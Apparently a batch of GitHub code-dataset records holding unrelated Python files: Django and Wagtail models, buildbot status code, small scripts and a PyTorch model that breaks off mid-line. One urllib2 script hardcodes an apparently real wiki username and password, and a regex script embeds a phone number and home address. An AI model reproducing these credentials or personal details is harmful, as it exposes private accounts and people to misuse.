0:\n self.direction_change = \"T\"\n elif change_value < 0:\n self.direction_change = \"D\"\n else:\n self.direction_change = \"N\"\n super(ValutaValue, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = \"Котировка валюты\"\n verbose_name_plural = \"Котировки валют\"\n ordering = [\"-date\"]\n unique_together = (\"valuta\", \"date\")\n","repo_name":"Igordr1999/datter2017","sub_path":"currency/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72737912233","text":"class Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n\n sortedNums = list()\n result = list()\n for idx in range(len(nums)-1, -1, -1):\n numSmaller = bisect.bisect_left(sortedNums, nums[idx])\n sortedNums.insert(numSmaller, nums[idx])\n result.append(numSmaller)\n return reversed(result)\n\ndef stringToIntegerList(input):\n return json.loads(input)\n\ndef integerListToString(nums, len_of_list=None):\n if not len_of_list:\n len_of_list = len(nums)\n return json.dumps(nums[:len_of_list])\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n nums = stringToIntegerList(line);\n\n ret = Solution().countSmaller(nums)\n\n out = integerListToString(ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"AnuKritiW/Coding-Exercises","sub_path":"Count of Smaller Numbers After Self/countSmaller.py","file_name":"countSmaller.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15457839431","text":"import os, shutil, re, weakref\nfrom cPickle import dump\nfrom zope.interface import implements\nfrom twisted.python import log, runtime\nfrom twisted.persisted import styles\nfrom twisted.internet import reactor, defer\nfrom buildbot import interfaces, util, sourcestamp\nfrom buildbot.process.properties import Properties\nfrom buildbot.status.buildstep import BuildStepStatus\n\nclass BuildStatus(styles.Versioned):\n implements(interfaces.IBuildStatus, interfaces.IStatusEvent)\n\n persistenceVersion = 3\n persistenceForgets = ( 'wasUpgraded', )\n\n source = None\n reason = None\n changes = []\n blamelist = []\n progress = None\n started = None\n finished = None\n currentStep = None\n text = []\n results = None\n slavename = \"???\"\n\n # these lists/dicts are defined here so that unserialized instances have\n # (empty) values. They are set in __init__ to new objects to make sure\n # each instance gets its own copy.\n watchers = []\n updates = {}\n finishedWatchers = []\n testResults = {}\n\n def __init__(self, parent, number):\n \"\"\"\n @type parent: L{BuilderStatus}\n @type number: int\n \"\"\"\n assert interfaces.IBuilderStatus(parent)\n self.builder = parent\n self.number = number\n self.watchers = []\n self.updates = {}\n self.finishedWatchers = []\n self.steps = []\n self.testResults = {}\n self.properties = Properties()\n\n def __repr__(self):\n return \"<%s #%s>\" % (self.__class__.__name__, self.number)\n\n # IBuildStatus\n\n def getBuilder(self):\n \"\"\"\n @rtype: L{BuilderStatus}\n \"\"\"\n return self.builder\n\n def getProperty(self, propname):\n return self.properties[propname]\n\n def getProperties(self):\n return self.properties\n\n def getNumber(self):\n return self.number\n\n def getPreviousBuild(self):\n if self.number == 0:\n return None\n return self.builder.getBuild(self.number-1)\n\n def getSourceStamp(self, absolute=False):\n if not absolute or not self.properties.has_key('got_revision'):\n return self.source\n return self.source.getAbsoluteSourceStamp(self.properties['got_revision'])\n\n def getReason(self):\n return self.reason\n\n def getChanges(self):\n return self.changes\n\n def getResponsibleUsers(self):\n return self.blamelist\n\n def getInterestedUsers(self):\n # TODO: the Builder should add others: sheriffs, domain-owners\n return self.blamelist + self.properties.getProperty('owners', [])\n\n def getSteps(self):\n \"\"\"Return a list of IBuildStepStatus objects. For invariant builds\n (those which always use the same set of Steps), this should be the\n complete list, however some of the steps may not have started yet\n (step.getTimes()[0] will be None). For variant builds, this may not\n be complete (asking again later may give you more of them).\"\"\"\n return self.steps\n\n def getTimes(self):\n return (self.started, self.finished)\n\n _sentinel = [] # used as a sentinel to indicate unspecified initial_value\n def getSummaryStatistic(self, name, summary_fn, initial_value=_sentinel):\n \"\"\"Summarize the named statistic over all steps in which it\n exists, using combination_fn and initial_value to combine multiple\n results into a single result. This translates to a call to Python's\n X{reduce}::\n return reduce(summary_fn, step_stats_list, initial_value)\n \"\"\"\n step_stats_list = [\n st.getStatistic(name)\n for st in self.steps\n if st.hasStatistic(name) ]\n if initial_value is self._sentinel:\n return reduce(summary_fn, step_stats_list)\n else:\n return reduce(summary_fn, step_stats_list, initial_value)\n\n def isFinished(self):\n return (self.finished is not None)\n\n def waitUntilFinished(self):\n if self.finished:\n d = defer.succeed(self)\n else:\n d = defer.Deferred()\n self.finishedWatchers.append(d)\n return d\n\n # while the build is running, the following methods make sense.\n # Afterwards they return None\n\n def getETA(self):\n if self.finished is not None:\n return None\n if not self.progress:\n return None\n eta = self.progress.eta()\n if eta is None:\n return None\n return eta - util.now()\n\n def getCurrentStep(self):\n return self.currentStep\n\n # Once you know the build has finished, the following methods are legal.\n # Before ths build has finished, they all return None.\n\n def getText(self):\n text = []\n text.extend(self.text)\n for s in self.steps:\n text.extend(s.text2)\n return text\n\n def getResults(self):\n return self.results\n\n def getSlavename(self):\n return self.slavename\n\n def getTestResults(self):\n return self.testResults\n\n def getTestResultsOrd(self):\n trs = self.testResults.keys()\n trs.sort()\n ret = [ self.testResults[t] for t in trs]\n return ret\n\n def getLogs(self):\n # TODO: steps should contribute significant logs instead of this\n # hack, which returns every log from every step. The logs should get\n # names like \"compile\" and \"test\" instead of \"compile.output\"\n logs = []\n for s in self.steps:\n for loog in s.getLogs():\n logs.append(loog)\n return logs\n\n # subscription interface\n\n def subscribe(self, receiver, updateInterval=None):\n # will receive stepStarted and stepFinished messages\n # and maybe buildETAUpdate\n self.watchers.append(receiver)\n if updateInterval is not None:\n self.sendETAUpdate(receiver, updateInterval)\n\n def sendETAUpdate(self, receiver, updateInterval):\n self.updates[receiver] = None\n ETA = self.getETA()\n if ETA is not None:\n receiver.buildETAUpdate(self, self.getETA())\n # they might have unsubscribed during buildETAUpdate\n if receiver in self.watchers:\n self.updates[receiver] = reactor.callLater(updateInterval,\n self.sendETAUpdate,\n receiver,\n updateInterval)\n\n def unsubscribe(self, receiver):\n if receiver in self.watchers:\n self.watchers.remove(receiver)\n if receiver in self.updates:\n if self.updates[receiver] is not None:\n self.updates[receiver].cancel()\n del self.updates[receiver]\n\n # methods for the base.Build to invoke\n\n def addStepWithName(self, name):\n \"\"\"The Build is setting up, and has added a new BuildStep to its\n list. Create a BuildStepStatus object to which it can send status\n updates.\"\"\"\n\n s = BuildStepStatus(self, len(self.steps))\n s.setName(name)\n self.steps.append(s)\n return s\n\n def setProperty(self, propname, value, source, runtime=True):\n self.properties.setProperty(propname, value, source, runtime)\n\n def addTestResult(self, result):\n self.testResults[result.getName()] = result\n\n def setSourceStamp(self, sourceStamp):\n self.source = sourceStamp\n self.changes = self.source.changes\n\n def setReason(self, reason):\n self.reason = reason\n def setBlamelist(self, blamelist):\n self.blamelist = blamelist\n def setProgress(self, progress):\n self.progress = progress\n\n def buildStarted(self, build):\n \"\"\"The Build has been set up and is about to be started. It can now\n be safely queried, so it is time to announce the new build.\"\"\"\n\n self.started = util.now()\n # now that we're ready to report status, let the BuilderStatus tell\n # the world about us\n self.builder.buildStarted(self)\n\n def setSlavename(self, slavename):\n self.slavename = slavename\n\n def setText(self, text):\n assert isinstance(text, (list, tuple))\n self.text = text\n def setResults(self, results):\n self.results = results\n\n def buildFinished(self):\n self.currentStep = None\n self.finished = util.now()\n\n for r in self.updates.keys():\n if self.updates[r] is not None:\n self.updates[r].cancel()\n del self.updates[r]\n\n watchers = self.finishedWatchers\n self.finishedWatchers = []\n for w in watchers:\n w.callback(self)\n\n # methods called by our BuildStepStatus children\n\n def stepStarted(self, step):\n self.currentStep = step\n for w in self.watchers:\n receiver = w.stepStarted(self, step)\n if receiver:\n if type(receiver) == type(()):\n step.subscribe(receiver[0], receiver[1])\n else:\n step.subscribe(receiver)\n d = step.waitUntilFinished()\n d.addCallback(lambda step: step.unsubscribe(receiver))\n\n step.waitUntilFinished().addCallback(self._stepFinished)\n\n def _stepFinished(self, step):\n results = step.getResults()\n for w in self.watchers:\n w.stepFinished(self, step, results)\n\n # methods called by our BuilderStatus parent\n\n def pruneSteps(self):\n # this build is very old: remove the build steps too\n self.steps = []\n\n # persistence stuff\n\n def generateLogfileName(self, stepname, logname):\n \"\"\"Return a filename (relative to the Builder's base directory) where\n the logfile's contents can be stored uniquely.\n\n The base filename is made by combining our build number, the Step's\n name, and the log's name, then removing unsuitable characters. The\n filename is then made unique by appending _0, _1, etc, until it does\n not collide with any other logfile.\n\n These files are kept in the Builder's basedir (rather than a\n per-Build subdirectory) because that makes cleanup easier: cron and\n find will help get rid of the old logs, but the empty directories are\n more of a hassle to remove.\"\"\"\n\n starting_filename = \"%d-log-%s-%s\" % (self.number, stepname, logname)\n starting_filename = re.sub(r'[^\\w\\.\\-]', '_', starting_filename)\n # now make it unique\n unique_counter = 0\n filename = starting_filename\n while filename in [l.filename\n for step in self.steps\n for l in step.getLogs()\n if l.filename]:\n filename = \"%s_%d\" % (starting_filename, unique_counter)\n unique_counter += 1\n return filename\n\n def __getstate__(self):\n d = styles.Versioned.__getstate__(self)\n # for now, a serialized Build is always \"finished\". We will never\n # save unfinished builds.\n if not self.finished:\n d['finished'] = util.now()\n # TODO: push an \"interrupted\" step so it is clear that the build\n # was interrupted. The builder will have a 'shutdown' event, but\n # someone looking at just this build will be confused as to why\n # the last log is truncated.\n for k in 'builder', 'watchers', 'updates', 'finishedWatchers':\n if k in d: del d[k]\n return d\n\n def __setstate__(self, d):\n styles.Versioned.__setstate__(self, d)\n # self.builder must be filled in by our parent when loading\n for step in self.steps:\n step.build = weakref.ref(self)\n self.watchers = []\n self.updates = {}\n self.finishedWatchers = []\n\n def upgradeToVersion1(self):\n if hasattr(self, \"sourceStamp\"):\n # the old .sourceStamp attribute wasn't actually very useful\n maxChangeNumber, patch = self.sourceStamp\n changes = getattr(self, 'changes', [])\n source = sourcestamp.SourceStamp(branch=None,\n revision=None,\n patch=patch,\n changes=changes)\n self.source = source\n self.changes = source.changes\n del self.sourceStamp\n self.wasUpgraded = True\n\n def upgradeToVersion2(self):\n self.properties = {}\n self.wasUpgraded = True\n\n def upgradeToVersion3(self):\n # in version 3, self.properties became a Properties object\n propdict = self.properties\n self.properties = Properties()\n self.properties.update(propdict, \"Upgrade from previous version\")\n self.wasUpgraded = True\n\n def upgradeLogfiles(self):\n # upgrade any LogFiles that need it. This must occur after we've been\n # attached to our Builder, and after we know about all LogFiles of\n # all Steps (to get the filenames right).\n assert self.builder\n for s in self.steps:\n for l in s.getLogs():\n if l.filename:\n pass # new-style, log contents are on disk\n else:\n logfilename = self.generateLogfileName(s.name, l.name)\n # let the logfile update its .filename pointer,\n # transferring its contents onto disk if necessary\n l.upgrade(logfilename)\n\n def checkLogfiles(self):\n # check that all logfiles exist, and remove references to any that\n # have been deleted (e.g., by purge())\n for s in self.steps:\n s.checkLogfiles()\n\n def saveYourself(self):\n filename = os.path.join(self.builder.basedir, \"%d\" % self.number)\n if os.path.isdir(filename):\n # leftover from 0.5.0, which stored builds in directories\n shutil.rmtree(filename, ignore_errors=True)\n tmpfilename = filename + \".tmp\"\n try:\n dump(self, open(tmpfilename, \"wb\"), -1)\n if runtime.platformType == 'win32':\n # windows cannot rename a file on top of an existing one, so\n # fall back to delete-first. There are ways this can fail and\n # lose the builder's history, so we avoid using it in the\n # general (non-windows) case\n if os.path.exists(filename):\n os.unlink(filename)\n os.rename(tmpfilename, filename)\n except:\n log.msg(\"unable to save build %s-#%d\" % (self.builder.name,\n self.number))\n log.err()\n\n def asDict(self):\n result = {}\n # Constant\n result['builderName'] = self.builder.name\n result['number'] = self.getNumber()\n result['sourceStamp'] = self.getSourceStamp().asDict()\n result['reason'] = self.getReason()\n result['blame'] = self.getResponsibleUsers()\n\n # Transient\n result['properties'] = self.getProperties().asList()\n result['times'] = self.getTimes()\n result['text'] = self.getText()\n result['results'] = self.getResults()\n result['slave'] = self.getSlavename()\n # TODO(maruel): Add.\n #result['test_results'] = self.getTestResults()\n result['logs'] = [[l.getName(),\n self.builder.status.getURLForThing(l)] for l in self.getLogs()]\n result['eta'] = self.getETA()\n result['steps'] = [bss.asDict() for bss in self.steps]\n if self.getCurrentStep():\n result['currentStep'] = self.getCurrentStep().asDict()\n else:\n result['currentStep'] = None\n return result\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":15841,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"16480671668","text":"from networkapi.wagtailpages import utils\n\n\nclass FoundationNavigationPageMixin:\n def get_context(self, request):\n context = super().get_context(request)\n context = utils.set_main_site_nav_information(self, context, \"Homepage\")\n return context\n\n class Meta:\n abstract = True\n","repo_name":"MozillaFoundation/foundation.mozilla.org","sub_path":"network-api/networkapi/wagtailpages/pagemodels/mixin/foundation_navigation.py","file_name":"foundation_navigation.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"72"} +{"seq_id":"16066360561","text":"import numpy as np\nimport cv2\nimg=cv2.imread('img3.png',1)\n#img= np.array([[[1, 2, 3],[4, 5, 6],[7, 8, 9]],[[2, 3, 4],[1, 3, 5],[6, 5, 7]]])\n#row=0\n#col=0\nfound=0\ncord = []\ncolor=[[0,0,255],[0,255,0]]\nfor k in color:\n\tcol=0\n\trow=0\n\tfor i in img:\n\t\trow+=1\n\t\t#col=0\n\t\tfor j in i:\n\t\t\tcol+=1\n\t\t\tif np.array_equal(j,k): #BGR value is given\n\t\t\t\t#print(row,col)\n\t\t\t\tprint('coordinates x,y for {} is {},{}'.format(k,col-1,row-1))\n\t\t\t\tcord.append((col-1,row-1))\t\n\t\t\t\tfound+=1\n\t\t\t\t#col=0\n\t\t\t\t#break\n\t\t\telif col==1024: #col==last db_column=''\n\t\t\t\tcol=0\n\t\t#if found:break\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\nif not found:print('not found')\nprint(cord)\nprint('total {} coordinates are found'.format(found))\n","repo_name":"tarunesh1234/opencv-tests","sub_path":"xycolor.py","file_name":"xycolor.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20837341684","text":"\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom metallum_scraper import request\nimport re\n\n\nclass Scraper:\n\n def get_band_details(self,url):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n categories = ['band_id', 'Name', 'Country of Origin', 'Location', 'Status', 'Year Formed', 'Genre',\n 'Lyrical Themes',\n 'Current Label', 'Years Active', 'datetime_added', 'datetime_modified']\n band_page = request.get_raw(url)\n\n soup = BeautifulSoup(band_page, 'html.parser')\n\n band_id = re.sub(\"\\n\", \"\", url[url.rindex(\"/\") + 1:])\n band_name = soup.find(\"h1\", {\"class\": \"band_name\"}).text\n ret_band = [band_id, band_name]\n div_band_stats = soup.find(\"div\", {\"id\": \"band_stats\"})\n\n stats_values = [\" \".join(a.text.strip().split()) for a in div_band_stats.find_all(\"dd\")]\n ret_band.extend(stats_values)\n ret_band.extend([now, now]) # create date, update date\n\n r_dict = dict(zip(categories, ret_band))\n\n return r_dict","repo_name":"Evans88/metallum_scraper","sub_path":"metallum_scraper/scrape/Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17932397329","text":"\"\"\"Code under test example\n\nThis module contains slightly modified version of example production code used to demonstrate\nwriting test when requirements change.\n\"\"\"\n\n\ndef modified_personalize_menu(menu, user):\n if user['is_allergic']: # key name changed\n return [dish for dish in menu if not dish.get('allergens')]\n\n return menu\n\n\n# example call\n\nmenu = [\n {'name': 'apple', 'allergens': []},\n {'name': 'chocolate cake', 'allergens': ['eggs', 'gluten', 'milk']},\n {'name': 'tomato soup', 'allergens': []},\n {'name': 'lasagne', 'allergens': ['eggs', 'milk']}\n]\n\nusers = [\n {'username': 'marvin', 'is_allergic': True},\n {'username': 'trillian', 'is_allergic': False}\n]\n\nfiltered_menu = modified_personalize_menu(menu, users[0])\nprint(filtered_menu)\n\nfiltered_menu = modified_personalize_menu(menu, users[1])\nprint(filtered_menu)\n","repo_name":"inesjelovac/demo-testing-best-practices","sub_path":"production_code/code_under_test_with_change_in_logic.py","file_name":"code_under_test_with_change_in_logic.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17270092426","text":"#coding=utf-8\nimport urllib\nimport urllib2\nimport cookielib\nimport zlib\n\nfilename = 'cookie.txt'\n#cookie = cookielib.CookieJar()\ncookie = cookielib.MozillaCookieJar(filename)\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n\npostdata = urllib.urlencode({\n 'os_username':'houkl',\n 'os_password':'0624houkailong',\n 'login':'登陆',\n 'os_destination':'/index.action'\n})\nreq = urllib2.Request(\n url = 'http://wiki.haodaibao.com/dologin.action',\n data = postdata\n)\nresult = opener.open(req)\ncookie.save(ignore_discard=True,ignore_expires=True)\ngradeUrl = 'http://wiki.haodaibao.com/pages/viewpage.action?pageId=2523729'\nresult = opener.open(gradeUrl)\nwith file('zichan.txt','wb') as code:\n code.write(result.read())\n result.close()\n\n","repo_name":"houkailong/py-project","sub_path":"test/get3.py","file_name":"get3.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27653486955","text":"import funcoes\n\nfuncoes.limpaTela()\n\nprint(\"JOGO DA FORCA\\n\")\nprint(\"Alunos: Marco Antonio Flores da Silva e Pedro Luan Rodrigues\\n\")\n\nwhile True:\n desafiante = input(\"Desafiante: \")\n competidor = input(\"Competidor: \")\n funcoes.jogadores(desafiante, competidor)\n\n funcoes.limpaTela()\n\n palavraChave = input(\"Digite a palavra chave: \")\n respostasDicas = [\"1ª Dica: \", \"2ª Dica: \", \"3ª Dica: \"]\n dicas = []\n for i in range (len(respostasDicas)):\n print(respostasDicas[i])\n dicas.append(input())\n \n funcoes.limpaTela()\n \n print(\"A palavra é composta por\", len(palavraChave), \"letras.\")\n for i in range (len(palavraChave)):\n print(end = \"\")\n \n erros = 0\n tentativas = []\n acertos= []\n vencedor = []\n\n while True:\n print(\"\\n\")\n print(\"(1) Jogar\")\n print(\"(2) Solicitar dica (\",len(dicas),\"disponíveis).\")\n print(\"Erro: \" , erros)\n \n opcao = input()\n if opcao == \"1\":\n letra = input(\"Digite uma letra: \")\n if letra in tentativas:\n print(\"Você já tentou essa letra anteriormente.\")\n elif letra not in palavraChave:\n print(\"Esse letra não pertence a palavra.\")\n tentativas.append(letra)\n erros += 1 \n else:\n print(\"Você acertou uma letra!\")\n acertos.append(letra)\n palavra = \"\"\n for letra in palavraChave:\n if letra in acertos:\n palavra += letra\n else:\n palavra += \"*\"\n print(palavra)\n if palavra == palavraChave:\n print(\"Parabéns! Você acertou!\")\n vencedor = competidor\n break\n elif opcao == \"2\":\n try:\n print(dicas[0])\n del dicas[0]\n except:\n print(\"Suas dicas acabaram!\")\n else:\n print(\"Opção inválida!\")\n \n if erros >= 5:\n print(\"Que pena! Você perdeu!\")\n break\n \n funcoes.relatorio(desafiante, competidor, palavraChave, vencedor)\n texto = funcoes.verRelatorio()\n for i in texto:\n texto = i.strip('\\n')\n print(texto)\n\n print(\"\\n(1) Sair.\")\n print(\"(2) Jogar novamente.\")\n opcao2 = input()\n if opcao2 == \"1\":\n break\n elif opcao2 == \"2\":\n pass\n else:\n print(\"Opção inválida!\")","repo_name":"maarcoafs/Jogo-da-Forca","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15945786502","text":"import re\nReDan = \"13502377825 =帝景湾维也纳北二门13号1003= 一个6斤左右熟的金枕榴莲(开肉送 拍视频) 20元百香果 转账 莉莉\"\nDingDan = \"\"\nXiaDan = \"\"\nCaoRe = \"\"\n\n#正则表达式预处理\n#预处理电话号码\nSubPa= re.compile(\"(?<=\\d{3})[ -]|\\s\")\n#预处理收款方式\nGcash = re.compile(r\"现金|收现转账都可以\")\nGvip = re.compile(r\"会员消费|电子卡消费\")\nGtran = re.compile(r\"转帐|已转账|已收现\")\nGmon = re.compile(r\"月底结算\")\n#获取电话号码\nPhone = re.compile(r\"[01]\\d{10}[/]?(?<=[/])\\d*|[01]\\d{10}|(?=3.4',\n install_requires=['bluepy>=1.0.5'],\n description='Library for reading temperature, humidity, and battery level from a '\n 'SHT31 Smart Gadget Development Kit by Sensirion',\n long_description=include_readme(),\n author='Matthias Erll',\n author_email='matthias@erll.de',\n url='https://github.com/merll/python-smartgadget',\n license=\"MIT\",\n)\n","repo_name":"merll/python-smartgadget","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72229420393","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport numpy as np\nimport os\nimport math\n\ntry:\n from transformers.modeling_bert import BertConfig, BertEncoder, BertModel \nexcept:\n from transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel \n\nclass Feed_Forward_block(nn.Module):\n def __init__(self, dim_ff):\n super().__init__()\n self.layer1 = nn.Linear(in_features=dim_ff , out_features=dim_ff)\n self.layer2 = nn.Linear(in_features=dim_ff , out_features=dim_ff)\n\n def forward(self,ffn_in):\n return self.layer2( F.relu( self.layer1(ffn_in) ) )\n\n\nclass Mymodel(nn.Module):\n\n def __init__(self, args):\n super(Mymodel, self).__init__()\n self.args = args\n self.device = args.device\n\n # Defining some parameters\n self.hidden_dim = self.args.hidden_dim\n self.n_layers = self.args.n_layers\n\n # Embedding \n # interaction은 현재 correct으로 구성되어있다. correct(1, 2) + padding(0)\n # n_test, n_questions, n_tag : 유니크한 개수??\n \n self.embed_dim = 128\n\n self.embedding_interaction = nn.Embedding(3, self.embed_dim)\n self.embedding_test = nn.Embedding(self.args.n_test + 1, self.embed_dim)\n self.embedding_question = nn.Embedding(self.args.n_questions + 1, self.embed_dim)\n self.embedding_tag = nn.Embedding(self.args.n_tag + 1, self.embed_dim)\n\n # 추가 feature\n self.embedding_userID_elapsed_cate = nn.Embedding(self.args.n_userID_elapsed_cate + 1, self.embed_dim)\n self.embedding_question_class = nn.Embedding(self.args.n_question_class + 1, self.embed_dim)\n self.embedding_userID_assessmentItemID_experience = nn.Embedding(self.args.n_userID_assessmentItemID_experience + 1, self.embed_dim)\n\n self.drop_out = nn.Dropout(self.args.drop_out)\n\n # embedding combination projection\n self.question_cate= nn.Linear(self.embed_dim*5, self.hidden_dim // 2)\n self.question_cont = nn.Linear(2, self.hidden_dim // 2)\n self.user_cate= nn.Linear(self.embed_dim*2, self.hidden_dim // 2)\n self.user_cont = nn.Linear(5, self.hidden_dim // 2)\n self.prelu1_question = nn.PReLU()\n self.prelu1_user = nn.PReLU()\n\n self.attention_layer = nn.MultiheadAttention(embed_dim= self.hidden_dim, num_heads= 8, dropout=self.args.drop_out)\n self.ff_layer = Feed_Forward_block(self.hidden_dim)\n self.prelu2_attention = nn.PReLU()\n\n\n self.question_layer_norm = nn.LayerNorm(self.hidden_dim)\n self.user_layer_norm = nn.LayerNorm(self.hidden_dim)\n self.layer_norm = nn.LayerNorm(self.hidden_dim)\n\n self.conv1d_layer1 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=1)\n self.prelu3_conv1 = nn.PReLU()\n self.conv1d_layer2 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=2)\n self.prelu3_conv2 = nn.PReLU()\n self.conv1d_layer3 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=3)\n self.prelu3_conv3 = nn.PReLU()\n self.conv1d_layer4 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=4)\n self.prelu3_conv4 = nn.PReLU()\n self.conv1d_layer5 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=5)\n self.prelu3_conv5 = nn.PReLU()\n self.conv1d_layer6 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=6)\n self.prelu3_conv6 = nn.PReLU()\n self.conv1d_layer7 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=7)\n self.prelu3_conv7 = nn.PReLU()\n self.conv1d_layer8 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=8)\n self.prelu3_conv8 = nn.PReLU()\n self.conv1d_layer9 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=9)\n self.prelu3_conv9 = nn.PReLU()\n self.conv1d_layer10 = nn.Conv1d(self.hidden_dim, self.hidden_dim, kernel_size=10)\n self.prelu3_conv10 = nn.PReLU()\n\n\n self.lstm = nn.LSTM(input_size= self.hidden_dim, hidden_size= self.hidden_dim, num_layers=1)\n self.fc = nn.Linear(self.hidden_dim , 1)\n self.activation = nn.Sigmoid()\n\n\n def forward(self, input):\n os.environ[\"CUDA_LAUNCH_BLOCKING\"] = \"1\"\n #test, question, tag, _, mask, interaction, _ = input\n test, question, tag, _, userID_elapsed_cate, IK_question_acc, question_class, IK_KnowledgeTag_acc, userID_acc, userID_assessmentItemID_experience, user_question_class_solved, solved_question, userID_KnowledgeTag_total_answer, userID_KnowledgeTag_acc, userID_acc_rolling, mask, interaction, _ = input\n batch_size = interaction.size(0)\n\n # 신나는 embedding\n embed_interaction = self.embedding_interaction(interaction)\n embed_test = self.embedding_test(test)\n embed_question = self.embedding_question(question)\n embed_tag = self.embedding_tag(tag) \n\n \n embed_userID_elapsed_cate = self.embedding_userID_elapsed_cate(userID_elapsed_cate)\n embed_question_class = self.embedding_question_class(question_class)\n embed_userID_assessmentItemID_experience = self.embedding_userID_assessmentItemID_experience(userID_assessmentItemID_experience)\n\n question_cate = torch.cat([embed_interaction,\n embed_test,\n embed_question,\n embed_tag,\n embed_question_class\n ], 2)\n\n question_cont = torch.cat([IK_question_acc.unsqueeze(-1),\n IK_KnowledgeTag_acc.unsqueeze(-1),\n ], 2)\n\n user_cate = torch.cat([\n embed_userID_elapsed_cate,\n embed_userID_assessmentItemID_experience,\n ], 2)\n\n user_cont = torch.cat([\n userID_acc.unsqueeze(-1),\n user_question_class_solved.unsqueeze(-1),\n solved_question.unsqueeze(-1),\n userID_KnowledgeTag_total_answer.unsqueeze(-1),\n userID_KnowledgeTag_acc.unsqueeze(-1),\n ], 2)\n\n question_cate_embed = self.question_cate(question_cate)\n question_cont_embed = self.question_cont(question_cont)\n\n user_cate_embed = self.user_cate(user_cate)\n user_cont_embed = self.user_cont(user_cont)\n\n question_embed = self.drop_out((torch.cat([question_cate_embed, question_cont_embed], 2)))\n user_embed = self.drop_out((torch.cat([user_cate_embed, user_cont_embed], 2)))\n\n question_embed = self.question_layer_norm(question_embed)\n user_embed = self.question_layer_norm(user_embed)\n\n question_embed = self.prelu1_question(question_embed)\n user_embed = self.prelu1_user(user_embed)\n\n out, attn_wt = self.attention_layer(question_embed , user_embed , user_embed)\n out = self.ff_layer(out)\n out = self.prelu2_attention(out)\n\n out = out + user_embed + question_embed\n\n conv_output1 = self.prelu3_conv1(self.conv1d_layer1(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output2 = self.prelu3_conv2(self.conv1d_layer2(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output3 = self.prelu3_conv3(self.conv1d_layer3(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output4 = self.prelu3_conv4(self.conv1d_layer4(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output5 = self.prelu3_conv5(self.conv1d_layer5(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output6 = self.prelu3_conv6(self.conv1d_layer6(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output7 = self.prelu3_conv7(self.conv1d_layer7(out.transpose(1, 2))) # 